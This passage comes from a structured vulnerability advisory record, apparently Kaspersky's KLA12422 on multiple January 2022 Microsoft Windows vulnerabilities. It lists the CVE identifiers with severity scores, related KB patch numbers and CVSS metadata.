\n[CVE-2022-21917](<https://nvd.nist.gov/vuln/detail/CVE-2022-21917>) \n[CVE-2022-21893](<https://nvd.nist.gov/vuln/detail/CVE-2022-21893>) \n[CVE-2022-21904](<https://nvd.nist.gov/vuln/detail/CVE-2022-21904>) \n[CVE-2022-21876](<https://nvd.nist.gov/vuln/detail/CVE-2022-21876>) \n[CVE-2022-21848](<https://nvd.nist.gov/vuln/detail/CVE-2022-21848>) \n[CVE-2022-21847](<https://nvd.nist.gov/vuln/detail/CVE-2022-21847>) \n[CVE-2022-21896](<https://nvd.nist.gov/vuln/detail/CVE-2022-21896>) \n[CVE-2022-21961](<https://nvd.nist.gov/vuln/detail/CVE-2022-21961>) \n[CVE-2022-21887](<https://nvd.nist.gov/vuln/detail/CVE-2022-21887>) \n[CVE-2022-21884](<https://nvd.nist.gov/vuln/detail/CVE-2022-21884>) \n[CVE-2022-21897](<https://nvd.nist.gov/vuln/detail/CVE-2022-21897>) \n[CVE-2022-21857](<https://nvd.nist.gov/vuln/detail/CVE-2022-21857>) \n[CVE-2022-21862](<https://nvd.nist.gov/vuln/detail/CVE-2022-21862>) \n[CVE-2022-21878](<https://nvd.nist.gov/vuln/detail/CVE-2022-21878>) \n[CVE-2022-21858](<https://nvd.nist.gov/vuln/detail/CVE-2022-21858>) \n[CVE-2022-21849](<https://nvd.nist.gov/vuln/detail/CVE-2022-21849>) \n[CVE-2022-21921](<https://nvd.nist.gov/vuln/detail/CVE-2022-21921>) \n[CVE-2022-21906](<https://nvd.nist.gov/vuln/detail/CVE-2022-21906>) \n[CVE-2022-21873](<https://nvd.nist.gov/vuln/detail/CVE-2022-21873>) \n[CVE-2022-21899](<https://nvd.nist.gov/vuln/detail/CVE-2022-21899>) \n[CVE-2022-21885](<https://nvd.nist.gov/vuln/detail/CVE-2022-21885>) \n[CVE-2022-21895](<https://nvd.nist.gov/vuln/detail/CVE-2022-21895>) \n[CVE-2022-21914](<https://nvd.nist.gov/vuln/detail/CVE-2022-21914>) \n[CVE-2022-21861](<https://nvd.nist.gov/vuln/detail/CVE-2022-21861>) \n[CVE-2022-21872](<https://nvd.nist.gov/vuln/detail/CVE-2022-21872>) \n[CVE-2022-21892](<https://nvd.nist.gov/vuln/detail/CVE-2022-21892>) \n[CVE-2022-21869](<https://nvd.nist.gov/vuln/detail/CVE-2022-21869>) \n[CVE-2022-21843](<https://nvd.nist.gov/vuln/detail/CVE-2022-21843>) \n[CVE-2022-21863](<https://nvd.nist.gov/vuln/detail/CVE-2022-21863>) \n[CVE-2022-21916](<https://nvd.nist.gov/vuln/detail/CVE-2022-21916>) \n[CVE-2022-21962](<https://nvd.nist.gov/vuln/detail/CVE-2022-21962>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-21860](<https://vulners.com/cve/CVE-2022-21860>)4.4Warning \n[CVE-2022-21959](<https://vulners.com/cve/CVE-2022-21959>)5.0Critical \n[CVE-2022-21852](<https://vulners.com/cve/CVE-2022-21852>)7.2High \n[CVE-2022-21859](<https://vulners.com/cve/CVE-2022-21859>)6.9High \n[CVE-2022-21915](<https://vulners.com/cve/CVE-2022-21915>)5.0Critical \n[CVE-2022-21875](<https://vulners.com/cve/CVE-2022-21875>)7.2High \n[CVE-2022-21908](<https://vulners.com/cve/CVE-2022-21908>)5.0Critical \n[CVE-2021-36976](<https://vulners.com/cve/CVE-2021-36976>)4.3Warning \n[CVE-2022-21834](<https://vulners.com/cve/CVE-2022-21834>)7.2High \n[CVE-2022-21864](<https://vulners.com/cve/CVE-2022-21864>)4.4Warning \n[CVE-2022-21910](<https://vulners.com/cve/CVE-2022-21910>)5.0Critical \n[CVE-2022-21898](<https://vulners.com/cve/CVE-2022-21898>)5.0Critical \n[CVE-2022-21922](<https://vulners.com/cve/CVE-2022-21922>)5.0Critical \n[CVE-2022-21881](<https://vulners.com/cve/CVE-2022-21881>)7.2High \n[CVE-2022-21838](<https://vulners.com/cve/CVE-2022-21838>)7.2High \n[CVE-2022-21867](<https://vulners.com/cve/CVE-2022-21867>)6.9High \n[CVE-2022-21901](<https://vulners.com/cve/CVE-2022-21901>)5.0Critical \n[CVE-2022-21865](<https://vulners.com/cve/CVE-2022-21865>)4.4Warning \n[CVE-2022-21850](<https://vulners.com/cve/CVE-2022-21850>)9.3Critical \n[CVE-2022-21870](<https://vulners.com/cve/CVE-2022-21870>)7.2High \n[CVE-2022-21912](<https://vulners.com/cve/CVE-2022-21912>)5.0Critical \n[CVE-2022-21913](<https://vulners.com/cve/CVE-2022-21913>)5.0Critical \n[CVE-2022-21894](<https://vulners.com/cve/CVE-2022-21894>)5.0Critical \n[CVE-2022-21960](<https://vulners.com/cve/CVE-2022-21960>)5.0Critical \n[CVE-2022-21879](<https://vulners.com/cve/CVE-2022-21879>)7.2High \n[CVE-2022-21835](<https://vulners.com/cve/CVE-2022-21835>)7.2High \n[CVE-2022-21903](<https://vulners.com/cve/CVE-2022-21903>)5.0Critical \n[CVE-2022-21964](<https://vulners.com/cve/CVE-2022-21964>)5.0Critical \n[CVE-2022-21907](<https://vulners.com/cve/CVE-2022-21907>)5.0Critical \n[CVE-2022-21889](<https://vulners.com/cve/CVE-2022-21889>)5.0Critical \n[CVE-2022-21866](<https://vulners.com/cve/CVE-2022-21866>)4.4Warning \n[CVE-2021-22947](<https://vulners.com/cve/CVE-2021-22947>)4.3Warning \n[CVE-2022-21919](<https://vulners.com/cve/CVE-2022-21919>)5.0Critical \n[CVE-2022-21851](<https://vulners.com/cve/CVE-2022-21851>)9.3Critical \n[CVE-2022-21920](<https://vulners.com/cve/CVE-2022-21920>)5.0Critical \n[CVE-2022-21888](<https://vulners.com/cve/CVE-2022-21888>)5.0Critical \n[CVE-2022-21868](<https://vulners.com/cve/CVE-2022-21868>)6.9High \n[CVE-2022-21963](<https://vulners.com/cve/CVE-2022-21963>)5.0Critical \n[CVE-2022-21958](<https://vulners.com/cve/CVE-2022-21958>)5.0Critical \n[CVE-2022-21928](<https://vulners.com/cve/CVE-2022-21928>)5.0Critical \n[CVE-2022-21924](<https://vulners.com/cve/CVE-2022-21924>)5.0Critical \n[CVE-2022-21905](<https://vulners.com/cve/CVE-2022-21905>)5.0Critical \n[CVE-2022-21836](<https://vulners.com/cve/CVE-2022-21836>)7.2High \n[CVE-2022-21839](<https://vulners.com/cve/CVE-2022-21839>)2.1Warning \n[CVE-2022-21918](<https://vulners.com/cve/CVE-2022-21918>)5.0Critical \n[CVE-2022-21900](<https://vulners.com/cve/CVE-2022-21900>)5.0Critical \n[CVE-2022-21880](<https://vulners.com/cve/CVE-2022-21880>)7.8Critical \n[CVE-2022-21883](<https://vulners.com/cve/CVE-2022-21883>)5.0Critical \n[CVE-2022-21882](<https://vulners.com/cve/CVE-2022-21882>)5.0Critical \n[CVE-2022-21902](<https://vulners.com/cve/CVE-2022-21902>)5.0Critical \n[CVE-2022-21833](<https://vulners.com/cve/CVE-2022-21833>)7.2High \n[CVE-2022-21877](<https://vulners.com/cve/CVE-2022-21877>)4.9Warning \n[CVE-2022-21871](<https://vulners.com/cve/CVE-2022-21871>)7.2High \n[CVE-2022-21890](<https://vulners.com/cve/CVE-2022-21890>)5.0Critical \n[CVE-2022-21917](<https://vulners.com/cve/CVE-2022-21917>)5.0Critical \n[CVE-2022-21893](<https://vulners.com/cve/CVE-2022-21893>)5.0Critical \n[CVE-2022-21904](<https://vulners.com/cve/CVE-2022-21904>)5.0Critical \n[CVE-2022-21876](<https://vulners.com/cve/CVE-2022-21876>)4.9Warning \n[CVE-2022-21848](<https://vulners.com/cve/CVE-2022-21848>)7.1High \n[CVE-2022-21847](<https://vulners.com/cve/CVE-2022-21847>)4.9Warning \n[CVE-2022-21896](<https://vulners.com/cve/CVE-2022-21896>)5.0Critical \n[CVE-2022-21961](<https://vulners.com/cve/CVE-2022-21961>)5.0Critical \n[CVE-2022-21887](<https://vulners.com/cve/CVE-2022-21887>)5.0Critical \n[CVE-2022-21884](<https://vulners.com/cve/CVE-2022-21884>)5.0Critical \n[CVE-2022-21897](<https://vulners.com/cve/CVE-2022-21897>)5.0Critical \n[CVE-2022-21857](<https://vulners.com/cve/CVE-2022-21857>)9.0Critical \n[CVE-2022-21862](<https://vulners.com/cve/CVE-2022-21862>)6.9High \n[CVE-2022-21878](<https://vulners.com/cve/CVE-2022-21878>)9.3Critical \n[CVE-2022-21858](<https://vulners.com/cve/CVE-2022-21858>)7.2High \n[CVE-2022-21849](<https://vulners.com/cve/CVE-2022-21849>)9.3Critical \n[CVE-2022-21921](<https://vulners.com/cve/CVE-2022-21921>)5.0Critical \n[CVE-2022-21906](<https://vulners.com/cve/CVE-2022-21906>)5.0Critical \n[CVE-2022-21873](<https://vulners.com/cve/CVE-2022-21873>)7.2High \n[CVE-2022-21899](<https://vulners.com/cve/CVE-2022-21899>)5.0Critical \n[CVE-2022-21885](<https://vulners.com/cve/CVE-2022-21885>)5.0Critical \n[CVE-2022-21895](<https://vulners.com/cve/CVE-2022-21895>)5.0Critical \n[CVE-2022-21914](<https://vulners.com/cve/CVE-2022-21914>)5.0Critical \n[CVE-2022-21861](<https://vulners.com/cve/CVE-2022-21861>)7.2High \n[CVE-2022-21872](<https://vulners.com/cve/CVE-2022-21872>)7.2High \n[CVE-2022-21892](<https://vulners.com/cve/CVE-2022-21892>)5.0Critical \n[CVE-2022-21869](<https://vulners.com/cve/CVE-2022-21869>)7.2High \n[CVE-2022-21843](<https://vulners.com/cve/CVE-2022-21843>)4.3Warning \n[CVE-2022-21863](<https://vulners.com/cve/CVE-2022-21863>)6.9High \n[CVE-2022-21916](<https://vulners.com/cve/CVE-2022-21916>)5.0Critical \n[CVE-2022-21962](<https://vulners.com/cve/CVE-2022-21962>)5.0Critical\n\n### *KB list*:\n[5009585](<http://support.microsoft.com/kb/5009585>) \n[5009546](<http://support.microsoft.com/kb/5009546>) \n[5009557](<http://support.microsoft.com/kb/5009557>) \n[5009586](<http://support.microsoft.com/kb/5009586>) \n[5009543](<http://support.microsoft.com/kb/5009543>) \n[5009619](<http://support.microsoft.com/kb/5009619>) \n[5009555](<http://support.microsoft.com/kb/5009555>) \n[5009595](<http://support.microsoft.com/kb/5009595>) \n[5009566](<http://support.microsoft.com/kb/5009566>) \n[5009545](<http://support.microsoft.com/kb/5009545>) \n[5009624](<http://support.microsoft.com/kb/5009624>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "kaspersky", "title": "KLA12422 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21917", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964"], "modified": "2022-01-18T00:00:00", "id": "KLA12422", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12422/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}